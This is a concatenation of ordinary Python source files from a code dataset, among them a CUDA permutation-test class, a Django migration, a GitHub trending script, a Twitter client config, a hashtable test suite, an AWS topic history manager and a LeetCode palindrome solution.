Concatenated sample from original samples A and B.\n bins(int): The number of bins to divide the sample values.\n\n Returns:\n digitized array\n \"\"\"\n digitized = np.zeros(X.shape,dtype=self.dtype_v)\n for i, (x,b) in enumerate(zip(X,bins)):\n digitized[i,:] = np.digitize(x, b).astype(self.dtype_v) - 1\n return digitized\n\n def _ensure_contiguous(self, z, S, A0, A1, init=None):\n \"\"\"Assert all arrays are contiguous.\n Args:\n A0 (array): Initialize A0 array.\n A1 (array): Second array to start fill.\n S(int): Sum up to :m.\n z(array): Digitized array.\n Returns:\n Contiguous arrays.\n \"\"\"\n return (np.ascontiguousarray(z, self.dtype_v), np.ascontiguousarray(S, self.dtype_v),\n np.ascontiguousarray(A0, self.dtype_A), np.ascontiguousarray(A1, self.dtype_A))\n\n def _load_gpu(self, z, S, A0, A1):\n \"\"\"Load arrays onto the GPU's.\n Args:\n z (array): Digitized array.\n A0 (array): Initialized A0 array.\n A1 (array): Second array to fill.\n S(int): Sum up to :m.\n Returns:\n GPU arrays.\n \"\"\"\n stream = cuda.stream()\n return (stream, cuda.to_device(z, stream), cuda.to_device(S, stream),\n 
cuda.to_device(A0, stream), cuda.to_device(A1, stream))\n \n \n\n def _run_calculations(self, dA0, dA1, dz, dS, length, threadsperblock, blockspergrid, stream, A0, A1):\n \"\"\"Start to fill the rest of working array.\n Args:\n dz (array): Digitized GPU-array.\n dA0 (array): Initialized A0 GPU-array.\n dA1 (array): A1 GPU-array.\n dS(int): Sum up to :m. GPU-array\n blockdim(tripple): Dimension of GPU-block\n griddim(tripple): Dimension of GPU-grid\n stream: GPU-stream\n Returns:\n The two last calculated sub-arrays (onto the GPU), dA0 and dA1.\n \"\"\"\n for i in range(1, length + 1):\n self._get_perm[blockspergrid, threadsperblock, stream](dA0, dA1, self.dtype_v(i), dz, dS)\n tmp = dA0\n dA0 = dA1\n dA1 = tmp \n return dA0, dA1\n \n def _get_calculated_array(self, dA0,dA1, A1,A0, stream, m):\n \"\"\"Retrieve the final subarray to host.\n Args:\n dA0 (array): Initialized A0 GPU-array.\n dA1 (array): A1 GPU-array.\n m (int): Length of sample A.\n stream: GPU-stream.\n Returns:\n Returns the necessary part for the p-value calculation from the final sub-array.\n \"\"\"\n dA0.to_host(stream)\n stream.synchronize()\n return A0[:, m - 1, :]\n\n def _calculate_p_values(self, Z, n_samples, S, A ,bins):\n \"\"\"Calculate p-value for each sub-array\n Args:\n Z (array): The necessary part of the array to calculate sample p-values.\n n_samples (int): The total number of samples.\n S(int): Sum up to :m.\n A(array): The Values from sample A.\n bins(array): Bins for digitization.\n Returns:\n p-values\n \"\"\"\n P = np.zeros(n_samples)\n for i, (a,b) in enumerate(zip(A,bins)):\n pmf = Z[:,i] / np.sum(Z[:,i])\n a_ = np.digitize(a, b).astype(self.dtype_v) - 1\n P[i] = np.sum(pmf[int(sum(a_)):(int(S[i])+1)])\n return P\n\n def _exact_perm_numba_shift(self, m, n, S, z):\n \"\"\"Run the shift-method on the GPU.\n Args:\n m (int): Sample size of sample A\n n (int): Sample size of sample B\n S(int): Sum up to :m.\n z (array): Digitized array.\n Returns:\n A necessary part of the calculated array to retrieve p-values.\n \"\"\"\n n_samples = z.shape[0]\n\n A0 = np.zeros([int(np.max(S)) + 1, m, n_samples], self.dtype_A)\n\n NN, NM, _ = A0[:, :, :].shape\n \n threadsperblock = (64, 3, 2)\n blockspergrid = (int(np.ceil((NN)/ threadsperblock[0])),\n int(np.ceil(NM/threadsperblock[1] + 1)),\n int(np.ceil(n_samples / threadsperblock[2] + 1)))\n \n A1 = np.zeros([int(np.max(S)) + 1, m, n_samples], self.dtype_A)\n\n z, S, A0, A1 = self._ensure_contiguous(z, S, A0, A1)\n \n stream, dz, dS, dA0, dA1 = self._load_gpu(z,S,A0,A1)\n \n dA0, dA1 = self._run_calculations(dA0, dA1, dz, dS, m + n, threadsperblock, blockspergrid, stream, A0, A1)\n return self._get_calculated_array(dA0,dA1, A1,A0, stream, m)\n \n\n def run(self, A, B):\n \"\"\"Run method on the GPU.\n Args:\n A (array): Samples A.\n B (array): Samples B.\n Returns:\n p-values\n \"\"\"\n m = A.shape[1]\n n = B.shape[1]\n\n n_samples = A.shape[0]\n\n X = np.concatenate([A,B],axis=1)\n X.sort()\n\n if not self.num_bin:\n self.num_bin = np.ceil(np.max(X)) - np.floor(np.min(X)) + 1\n\n bins = np.linspace(np.min(X, axis=1), np.max(X, axis=1), self.num_bin, axis=1)\n\n digitized = self._get_digitized_score(X, bins)\n\n S = np.sum(digitized[:, m:], axis=1)\n \n self.numerator = self._exact_perm_numba_shift(int(m), int(n), S, digitized)\n self.p_values = self._calculate_p_values(self.numerator, n_samples, S, A, bins)\n \n def get_numerator(self):\n \"\"\"Get numerator.\n Returns:\n numerator\n \"\"\"\n return self.numerator\n \n def get_p_values(self):\n \"\"\"Get 
p-values.\n Returns:\n Get p-values\n \"\"\"\n return self.p_values\n\n \n","sub_path":"significance_of_mean_cuda.py","file_name":"significance_of_mean_cuda.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"34081458","text":"#!/usr/bin/python3\nfrom sys import stdin\n\ndef main ():\n n = int (stdin.readline ())\n bc = stdin.read ().splitlines ()\n ans = 0\n for line in bc [::-1]:\n b, c = map (int, line.split ())\n b = (ans + b) % c\n if b: ans += c - b\n print (ans)\n\nif __name__ == \"__main__\": main ()","sub_path":"_equal_division.py","file_name":"_equal_division.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"207056871","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('nsa_rest', '0002_auto_20150304_2013'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='machine',\n name='loan_end_date',\n field=models.DateTimeField(null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='machine',\n name='owner',\n field=models.CharField(max_length=100, null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='machine',\n name='owner_email',\n field=models.EmailField(max_length=100, null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='machine',\n name='loan_start_date',\n field=models.DateTimeField(null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"nsa_rest/migrations/0003_auto_20150304_2018.py","file_name":"0003_auto_20150304_2018.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"332844912","text":"import requests\nimport json\nfrom datetime import datetime, timedelta\n\n\ndef get_trending_repositories(top_size, count_of_days):\n days_ago = (\n datetime.today() - timedelta(count_of_days)\n ).strftime('%Y-%m-%d')\n params = {\n 'q': 'created>{}'.format(days_ago),\n 'sort': 'stars',\n 'order': 'desc'\n }\n all_repos = requests.get(\n 'https://api.github.com/search/repositories',\n params=params\n ).json()\n trend_repo = all_repos['items'][:top_size]\n return trend_repo\n\n\ndef get_issues(owner, repo_name):\n data_issue = requests.get(\n 'https://api.github.com/repos/{}/{}/issues'.format(\n owner,\n repo_name\n )\n ).json()\n return data_issue\n\n\ndef print_repo_info(repo_name, html_url, count_of_issues):\n print('Repository: {}'.format(repo_name))\n print('URL: {}'.format(html_url))\n print('Count of issues: {}'.format(count_of_issues))\n\n\nif __name__ == '__main__':\n top_size = 20\n count_of_days = 7\n trending_repos = get_trending_repositories(top_size, count_of_days)\n for repo in trending_repos:\n issues = (get_issues(repo['owner']['login'], repo['name']))\n print_repo_info(repo['name'], repo['html_url'], len(issues))\n","sub_path":"github_trending.py","file_name":"github_trending.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"64600949","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport argparse\nimport os\nfrom datetime import datetime\nfrom utils.logger import setlogger\nimport logging\nfrom utils.train_utils_base 
import train_utils\nimport torch\nimport warnings\nprint(torch.__version__)\nwarnings.filterwarnings('ignore')\n\nargs = None\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train')\n\n # model and data parameters\n parser.add_argument('--model_name', type=str, default='CNN_1d', help='the name of the model')\n parser.add_argument('--data_name', type=str, default='JNU', help='the name of the data')\n parser.add_argument('--data_dir', type=str, default='D:/Data\\江南大学数据\\数据', help='the directory of the data')\n\n parser.add_argument('--transfer_task', type=list, default=[[0], [1]], help='transfer learning tasks')\n parser.add_argument('--normlizetype', type=str, default='mean-std', help='nomalization type')\n\n\n # adabn parameters\n parser.add_argument('--adabn', type=bool, default=True, help='whether using adabn')\n parser.add_argument('--eval_all', type=bool, default=False, help='whether using all samples to update the results')\n parser.add_argument('--adabn_epochs', type=int, default=3, help='the number of training process')\n\n\n # training parameters\n parser.add_argument('--cuda_device', type=str, default='0', help='assign device')\n parser.add_argument('--checkpoint_dir', type=str, default='./checkpoint_adabn', help='the directory to save the model')\n parser.add_argument(\"--pretrained\", type=bool, default=False, help='whether to load the pretrained model')\n parser.add_argument('--batch_size', type=int, default=64, help='batchsize of the training process')\n parser.add_argument('--num_workers', type=int, default=0, help='the number of training process')\n\n\n # optimization information\n parser.add_argument('--opt', type=str, choices=['sgd', 'adam'], default='adam', help='the optimizer')\n parser.add_argument('--lr', type=float, default=1e-3, help='the initial learning rate')\n parser.add_argument('--momentum', type=float, default=0.9, help='the momentum for sgd')\n parser.add_argument('--weight-decay', type=float, default=1e-5, help='the weight decay')\n parser.add_argument('--lr_scheduler', type=str, choices=['step', 'exp', 'stepLR', 'fix'], default='step', help='the learning rate schedule')\n parser.add_argument('--gamma', type=float, default=0.1, help='learning rate scheduler parameter for step and exp')\n parser.add_argument('--steps', type=str, default='150, 250', help='the learning rate decay for step and stepLR')\n\n\n # save, load and display information\n parser.add_argument('--max_epoch', type=int, default=300, help='max number of epoch')\n parser.add_argument('--print_step', type=int, default=600, help='the interval of log training information')\n\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n\n args = parse_args()\n os.environ['CUDA_VISIBLE_DEVICES'] = args.cuda_device.strip()\n # Prepare the saving path for the model\n sub_dir = args.model_name + '_' + datetime.strftime(datetime.now(), '%m%d-%H%M%S')\n save_dir = os.path.join(args.checkpoint_dir, sub_dir)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n # set the logger\n setlogger(os.path.join(save_dir, 'train.log'))\n\n # save the args\n for k, v in args.__dict__.items():\n logging.info(\"{}: {}\".format(k, v))\n\n trainer = train_utils(args, save_dir)\n trainer.setup()\n trainer.train()\n\n\n\n\n\n","sub_path":"train_base.py","file_name":"train_base.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"462766580","text":"import pacman\nimport layout\nimport 
graphicsDisplay\nimport sys\nfrom io import StringIO\nimport csv\n\nif __name__ == '__main__':\n \"\"\"\n test OBJ\n \"\"\"\n pacman_p = 'ReflexAgent'\n depth_p = '2'\n layouts = ['minimaxClassic', 'trappedClassic', 'testClassic', 'smallClassic',\n 'originalClassic', 'openClassic', 'mediumClassic',\n 'contestClassic', 'trickyClassic', 'capsuleClassic']\n depths = ['2']\n\n\n std_out = sys.stdout\n fieldnames = ['Agent', 'layout', 'depth', 'average score', 'average turn time']\n with open('ReflexAgent_A.csv', mode='w', newline='') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n\n for layout in layouts:\n for depth in depths:\n sys.argv.append('-p')\n sys.argv.append(pacman_p)\n sys.argv.append('-q')\n sys.argv.append('-k')\n sys.argv.append(depth)\n sys.argv.append('-l')\n sys.argv.append(layout)\n sys.argv.append('-n')\n sys.argv.append('7')\n\n print(sys.argv)\n stream = StringIO()\n sys.stdout = stream\n print(sys.argv)\n # args_i = ['run.py', '-p', 'ReflexAgent', '-q']\n pacman.main()\n\n del sys.argv[:9]\n average_score = float(stream.getvalue().split(\"\\n\")[8].split(\":\")[1])\n average_time = float(stream.getvalue().split(\"\\n\")[12].split(\":\")[1])\n with open('ReflexAgent_A.csv', mode='a', newline='') as f:\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writerow({'Agent': pacman_p, 'layout': layout, 'depth': depth, 'average score': average_score,\n 'average turn time': average_time})\n stream.close()\n sys.stdout = std_out\n # sys.argv.pop()\n # sys.argv.pop()\n","sub_path":"HW2-pacman/pacman/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"640821558","text":"'''Aula 09 - Exerc.07\r\nURI 2116\r\n'''\r\n#Felipe Backes Kettl\r\n\r\ndef isprimo(numero):\r\n count = 0\r\n for j in range(1, numero+1):\r\n if numero % j == 0 :\r\n count +=1\r\n if count == 2:\r\n return True\r\n else:\r\n return False\r\n\r\nn, m = [int(x) for x in input().split()]\r\n\r\nwhile True:\r\n if (2 <= n <= 1000) and (2 <= m <= 1000):\r\n break\r\n n, m = [int(x) for x in input().split()]\r\n\r\nfor j in range(n, 0, -1):\r\n if isprimo(j) == True:\r\n primo1 = j\r\n break\r\n\r\nfor i in range(m, 0, -1):\r\n if isprimo(i) == True:\r\n primo2 = i\r\n break\r\n\r\nprint(primo1 * primo2)","sub_path":"Aula 09/Aula09_Ex07.py","file_name":"Aula09_Ex07.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"153308075","text":"from ConfigParser import ConfigParser\nimport os\nimport tweepy\nimport colored as clrd \nimport json\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('drsa-twitter')\n\ndef color(text, fg=None, bg=None, bold=False):\n res = text\n if fg:\n res = \"%s%s\" % (clrd.fg(fg), res)\n if bg:\n res = \"%s%s\" % (clrd.bg(fg), res)\n if bold:\n res = \"%s%s\" % (clrd.attr('bold'), res)\n if fg or bg or bold:\n res = \"%s%s\" % (res, clrd.attr('reset'))\n return res\n\ndef get_config():\n default_fname = os.environ.get('DRSA_TWITTER_CONFIG', 'config.cfg')\n\n fname = None\n config_paths = ['/etc/drsa-toolkit/twitter.cfg', default_fname]\n for i in config_paths:\n if os.path.exists(i):\n fname = i\n\n if fname is None:\n raise RuntimeError(\n \"Unable to find config file in %s\" % ', '.join(config_paths)\n )\n\n cp = ConfigParser()\n cp.readfp(open(fname))\n\n result = {\n 'consumer-key': 
cp.get('drsa-twitter', 'consumer-key'),\n 'consumer-secret': cp.get('drsa-twitter', 'consumer-secret'),\n 'access-token-key': cp.get('drsa-twitter', 'token-key'),\n 'access-token-secret': cp.get('drsa-twitter', 'token-secret'),\n 'woeid': cp.get('drsa-twitter', 'woeid')\n }\n\n return result\n\ndef get_auth():\n\n config = get_config()\n\n auth = tweepy.OAuthHandler(config['consumer-key'], config['consumer-secret']) #OAuth object\n auth.set_access_token(\n config['access-token-key'],\n config['access-token-secret']\n )\n\n return auth\n\ndef get_api():\n auth = get_auth()\n return tweepy.API(\n auth,\n retry_count=200,\n retry_delay=30,\n retry_errors=[404,403,502,503],\n timeout=20,\n wait_on_rate_limit=True,\n wait_on_rate_limit_notify=True\n )\n\n\ndef save_or_discard(data, f):\n d = data\n with open(f, 'a') as output:\n timezone = d['user']['time_zone'] or ''\n if timezone.upper() in ['KUALA LUMPUR', '']:\n output.write(json.dumps(data) + '\\n')\n logger.info('%s[%s %s]: @%s (%s) %s' % (\n color('STORED', 'green', bold=True),\n color(data['created_at'], 'blue'),\n color(timezone.upper(), 'yellow'),\n color(d['user']['screen_name'], bold=True),\n d['user']['name'],\n d['text'])\n )\n else:\n logger.info('%s[%s %s]: @%s (%s) %s' % (\n color('DISCARD', 'red', bold=True),\n color(data['created_at'], 'blue'),\n color(timezone.upper(), 'yellow'),\n color(d['user']['screen_name'], bold=True),\n d['user']['name'],\n d['text'])\n )\n","sub_path":"src/drsa/twitter/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"319911307","text":"#!/usr/bin/python\n'''\nProduces POSIX commands to setup the environment variables for Geant4.\n\nRequired command line arguments:\n1: Location of geant4.sh script.\n2: Version of Geant4.\n'''\n\nimport os\nimport sys\nimport re\nimport subprocess as subp\nfrom codecs import encode,decode\n\ngeant4_sh, geant4_version = sys.argv[1:]\n\n# vars and standard directory names\ngeant4_vars = {\n \"G4ABLADATA\" : \"G4ABLA\",\n \"G4LEDATA\" : \"G4EMLOW\",\n \"G4LEVELGAMMADATA\" : \"PhotonEvaporation\",\n \"G4NEUTRONHPDATA\" : \"G4NDL\",\n \"G4NEUTRONXSDATA\" : \"G4NEUTRONXS\",\n \"G4PIIDATA\" : \"G4PII\",\n \"G4RADIOACTIVEDATA\": \"RadioactiveDecay\",\n \"G4REALSURFACEDATA\": \"RealSurface\",\n \"G4ENSDFSTATEDATA\" : \"G4ENSDFSTATE2.2\",\n \"G4SAIDXSDATA\" : \"G4SAIDDATA1.1\"\n}\n\ngeant4_env = {}\n\n# try to get vars from geant4.sh script\nif os.path.isfile(geant4_sh):\n p = subp.Popen(\"/bin/bash\",\n stdin=subp.PIPE,\n stdout=subp.PIPE,\n cwd=os.path.dirname(geant4_sh),\n env={})\n penv = decode(p.communicate(encode(\"source geant4.sh && env\"))[0].strip())\n for line in penv.split(\"\\n\"):\n sep = line.index(\"=\")\n var = line[:sep]\n value = line[sep+1:]\n if var in geant4_vars:\n geant4_env[var] = value\n\nformatted_pairs = []\nfor var in geant4_vars:\n\n value = None\n if var in os.environ:\n # warn user that existing environment variables override this script,\n # but don't complain if we are just running inside an env-shell.sh\n value = os.environ[var]\n if not \"I3_SHELL\" in os.environ:\n sys.stderr.write((\"Warning: Geant4 environment variable already set {0}={1}, \"\n \"this overrides automatic detection\\n\")\n .format(var, value))\n elif var in geant4_env:\n value = geant4_env[var]\n\n if value is None:\n sys.stderr.write((\"Warning: Geant4 environment variable {0} could not be set, \"\n \"g4-based modules may 
crash\\n\").format(var))\n else:\n formatted_pairs.append(\"{0}={1}\".format(var, value)) \n\n# extra formatting for env-shell.sh \nsys.stdout.write(\" \\\\\\n\\t\".join(formatted_pairs))\n","sub_path":"cmake/make_geant4_env.py","file_name":"make_geant4_env.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"497777741","text":"__author__ = 'lin'\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^company/page/(.*)', views.company_detail, name='company'),\n url(r'^query/(.*)', views.search_companys, name='search'),\n url(r'^company/info/(.*)', views.get_company_detail, name='companyInfo'),\n]","sub_path":"search/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"309431394","text":"import unittest\nimport random\nfrom hashtable import HashTable\n\n# The Unit Test Suite for HashTable\nclass TestContainer(unittest.TestCase):\n # The constructor working properly\n def test_constructor_success(self):\n size = random.randint(1, 100)\n x = HashTable(size)\n self.assertTrue(x)\n self.assertEqual(x.size, size)\n self.assertTrue(len(x.buckets)>size)\n self.assertEqual(x.itemCount, 0)\n\n # The Constructor given a size too small\n def test_constructor_value_error(self):\n size = 0\n try:\n x = HashTable(size)\n self.assertTrue(False)\n except ValueError:\n self.assertTrue(True)\n\n # The Constructor given an non-int\n def test_constructor_type_error(self):\n size = \"hello\"\n try:\n x = HashTable(size)\n self.assertTrue(False)\n except TypeError:\n self.assertTrue(True)\n\n # All actions should fail if given a non-string key\n def test_key_error(self):\n size = 1\n x = HashTable(size)\n try:\n x.begin_action(1)\n self.assertTrue(False)\n except TypeError:\n self.assertTrue(True)\n\n # Makes sure set returns true and increments itemCount\n def test_set_success(self):\n size = 1\n x = HashTable(size)\n self.assertTrue(x.set(\"test\", 1))\n self.assertEqual(x.itemCount, 1)\n\n # Makes sure set fails if the table is full\n def test_set_failure(self):\n size = 1\n x = HashTable(size)\n x.set(\"test\", 1)\n self.assertFalse(x.set(\"test2\", 1))\n\n # Makes sure that get returns correct value when value exists\n def test_get_success(self):\n size = 1\n x = HashTable(size)\n x.set(\"test\", 1)\n self.assertTrue(x.get(\"test\"))\n self.assertEqual(x.get(\"test\"), 1)\n\n # Makes sure that get returns the most recent value if set is\n # used twice with the same key. 
Also checks that itemCount is not\n # incremented\n def test_update(self):\n size = 1\n x = HashTable(size)\n x.set(\"test\", 1)\n x.set(\"test\", 2)\n self.assertEqual(x.get(\"test\"), 2)\n self.assertEqual(x.itemCount, 1)\n\n # Makes sure that x returns none for non-existing entries\n def test_get_failure(self):\n size = 1\n x = HashTable(size)\n self.assertIsNone(x.get(\"test\"))\n\n # Makes sure deleting an existing entry returns the value,\n # decrements the item count, and removes the entry\n def test_delete_success(self):\n size = 1\n x = HashTable(size)\n x.set(\"test\", 1)\n self.assertEqual(x.delete(\"test\"), 1)\n self.assertEqual(x.itemCount, 0)\n self.assertFalse(x.get(\"test\"))\n\n # Makes sure deleting non existant values returns None\n def test_delete_failure(self):\n size = 1\n x = HashTable(size)\n self.assertFalse(x.delete(\"test\"))\n\n # Tests that the type can handle alot of entries and\n # always appropriately calculates load\n def test_load(self):\n size = 100\n x = HashTable(size)\n for i in range(x.size):\n self.assertTrue(x.set(\"test\"+str(i), i))\n self.assertEqual(x.load(), float(i+1)/float(size))\n\n# Runs all tests\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"193451677","text":"\"\"\"\nYou are given a string s. You need to reverse the string.\n\nExample 1:\n\nInput:\ns = Geeks\nOutput: skeeG\nExample 2:\n\nInput:\ns = for\nOutput: rof\n\"\"\"\n\ndef reverseword(arr):\n i=0\n j=len(arr)-1\n while(i now or self.end > now:\n return False\n\n if self.start > self.end:\n return False\n\n if self.include_wrapper and self.checkpoint is not None:\n return False\n\n if self.rec_only and self.fetch_last_written:\n return False\n\n if self.rec_only and self.path:\n return False\n\n if self.rec_only and self.min_max:\n return False\n\n if self.min_max and self.checkpoint is None:\n return False\n\n if self.exclude_remainder and self.checkpoint is None:\n return False\n\n return True\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def next_params(self, start):\n return TopicHistoryRequest(self.topic, start, self.end, self.path, self.fetch_last_written, self.checkpoint,\n self.include_wrapper, self.rec_only, self.min_max, self.exclude_remainder,\n self.backoff_limit, self.fetch_last_written_before).params()\n\n\n def change_params(self, start, end):\n return TopicHistoryRequest(self.topic, start, end, self.path, self.fetch_last_written, self.checkpoint,\n self.include_wrapper, self.rec_only, self.min_max, self.exclude_remainder,\n self.backoff_limit, self.fetch_last_written_before)\n\n\n def params(self):\n params = {\n self.TOPIC: self.topic,\n self.START: None if self.start is None else self.start.utc().as_iso8601(include_millis=True),\n self.END: self.end.utc().as_iso8601(include_millis=True)\n }\n\n if self.path is not None:\n params[self.PATH] = self.path\n\n if self.fetch_last_written:\n params[self.FETCH_LAST_WRITTEN] = 'true'\n\n if self.checkpoint is not None:\n params[self.CHECKPOINT] = self.checkpoint\n\n if self.include_wrapper:\n params[self.INCLUDE_WRAPPER] = 'true'\n\n if self.rec_only:\n params[self.REC_ONLY] = 'true'\n\n if self.min_max:\n params[self.MIN_MAX] = 'true'\n\n if self.exclude_remainder:\n params[self.EXCLUDE_REMAINDER] = 'true'\n\n if self.fetch_last_written_before:\n 
params[self.FETCH_LAST_WRITTEN_BEFORE] = 'true'\n\n if self.backoff_limit:\n params[self.BACKOFF_LIMIT] = self.backoff_limit\n\n return params\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @property\n def checkpoint(self):\n if self.__checkpoint is None:\n return None\n\n if self.__checkpoint == 'auto':\n return self.checkpoint_table(self.start, self.end)\n\n return self.__checkpoint\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @property\n def topic(self):\n return self.__topic\n\n\n @property\n def start(self):\n return self.__start\n\n\n @property\n def end(self):\n return self.__end\n\n\n @property\n def path(self):\n return self.__path\n\n\n @property\n def fetch_last_written(self):\n return self.__fetch_last_written\n\n\n @property\n def include_wrapper(self):\n return self.__include_wrapper\n\n\n @property\n def rec_only(self):\n return self.__rec_only\n\n\n @property\n def min_max(self):\n return self.__min_max\n\n\n @property\n def exclude_remainder(self):\n return self.__exclude_remainder\n\n\n @property\n def fetch_last_written_before(self):\n return self.__fetch_last_written_before\n\n\n @property\n def backoff_limit(self):\n return self.__backoff_limit\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __str__(self, *args, **kwargs):\n return \"TopicHistoryRequest:{topic:%s, start:%s, end:%s, path:%s, fetch_last_written:%s, checkpoint:%s, \" \\\n \"include_wrapper:%s, rec_only:%s, min_max:%s, exclude_remainder:%s, \" \\\n \"fetch_last_written_before:%s, backoff_limit:%s}\" % \\\n (self.topic, self.start, self.end, self.path, self.fetch_last_written, self.__checkpoint,\n self.include_wrapper, self.rec_only, self.min_max, self.exclude_remainder,\n self.fetch_last_written_before, self.backoff_limit)\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nclass TopicHistoryResponse(APIResponse):\n \"\"\"\n classdocs\n \"\"\"\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @classmethod\n def construct_from_jdict(cls, jdict):\n if not jdict:\n return None\n\n fetched_last = jdict.get('fetchedLastWrittenData')\n interval = jdict.get('interval')\n\n items = []\n for msg_jdict in jdict.get('Items'):\n item = Message.construct_from_jdict(msg_jdict) if 'payload' in msg_jdict else msg_jdict\n items.append(item)\n\n next_url = jdict.get('next')\n\n return cls(fetched_last, interval, items, next_url)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __init__(self, fetched_last, interval, items, next_url):\n \"\"\"\n Constructor\n \"\"\"\n self.__fetched_last = fetched_last # \"Fetched last written data\" flag\n self.__interval = interval # int\n\n self.__items = items # list of Message\n\n self.__next_url = next_url # URL string\n\n\n def __len__(self):\n return len(self.items)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def next_params(self, params):\n next_params = parse_qs(urlparse(self.next_url).query)\n\n # noinspection PyTypeChecker\n params[TopicHistoryRequest.START] = next_params[TopicHistoryRequest.START][0]\n\n\n # 
----------------------------------------------------------------------------------------------------------------\n\n def as_json(self):\n jdict = OrderedDict()\n\n if self.fetched_last is not None:\n jdict['fetchedLastWrittenData'] = self.fetched_last\n\n if self.items is not None:\n jdict['interval'] = None if self.interval is None else int(round(self.interval))\n\n jdict['Items'] = self.items\n jdict['itemCount'] = len(self.items)\n\n if self.next_url is not None:\n jdict['next'] = self.next_url\n\n return jdict\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def start(self):\n if not self.items:\n return None\n\n item = self.items[0]\n\n try:\n return item['rec']\n except TypeError:\n return item.payload['rec']\n\n\n def end(self):\n if not self.items:\n return None\n\n item = self.items[-1]\n\n try:\n return item['rec']\n except TypeError:\n return item.payload['rec']\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @property\n def fetched_last(self):\n return self.__fetched_last\n\n\n @property\n def interval(self):\n return self.__interval\n\n\n @property\n def items(self):\n return self.__items\n\n\n @property\n def next_url(self):\n return self.__next_url\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __str__(self, *args, **kwargs):\n return \"TopicHistoryResponse:{fetched_last:%s, interval:%s, items:%s, next_url:%s}\" % \\\n (self.fetched_last, self.interval, Str.collection(self.items), self.next_url)\n","sub_path":"src/scs_core/aws/manager/topic_history_manager.py","file_name":"topic_history_manager.py","file_ext":"py","file_size_in_byte":15057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"160941948","text":"#!/usr/bin/python3\n\nimport sys, os, random\n\nprint(\"What is your name: \", end='')\n# stdout is flushed every newline\nsys.stdout.flush()\nname = sys.stdin.readline()\n# Print automaticaly inserts space between tokens\nprint(\"Hello\", name)\n\n","sub_path":"python/08-userinput.py","file_name":"08-userinput.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"388617235","text":"# 给定一个字符串 s,找到 s 中最长的回文子串。你可以假设 s 的最大长度为 1000。\n\n\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n length = len(s)\n start = 0\n end = 0\n if len(s) == 1:\n return s\n for i in range(length):\n for j in range(i + 1, length + 1):\n if s[i: j] == s[i: j][::-1] and j - i > end - start:\n end = j\n start = i\n return s[start: end]\n# 评价:leetcode上传后返回内部出错的错误类型,需要更改\n\n# 利用动态规划的正确解法如下,\n# 考虑到s为空或者为单个字符的时候直接输出,\n# 外循环表示子串的长度,从length减到1,内循环表示下标的变化,从0到len(s)-length+1\n# 技巧点:从大到小进行循环,所以不需要判断条件,第一个符合条件的就直接输出\n#\n# class Solution:\n# def longestPalindrome(self, s: str) -> str:\n# if len(s) <= 1:\n# return s\n# for length in range(len(s), 0, -1):\n# for i in range(0, len(s)-length+1):\n# now_s = s[i:i+length]\n# if now_s == now_s[::-1]:\n# return now_s\n#\n# # 改进:该方法进行判断回文的时候时间复杂度为T(n),需要在此基础上进行改进\n#\n# # 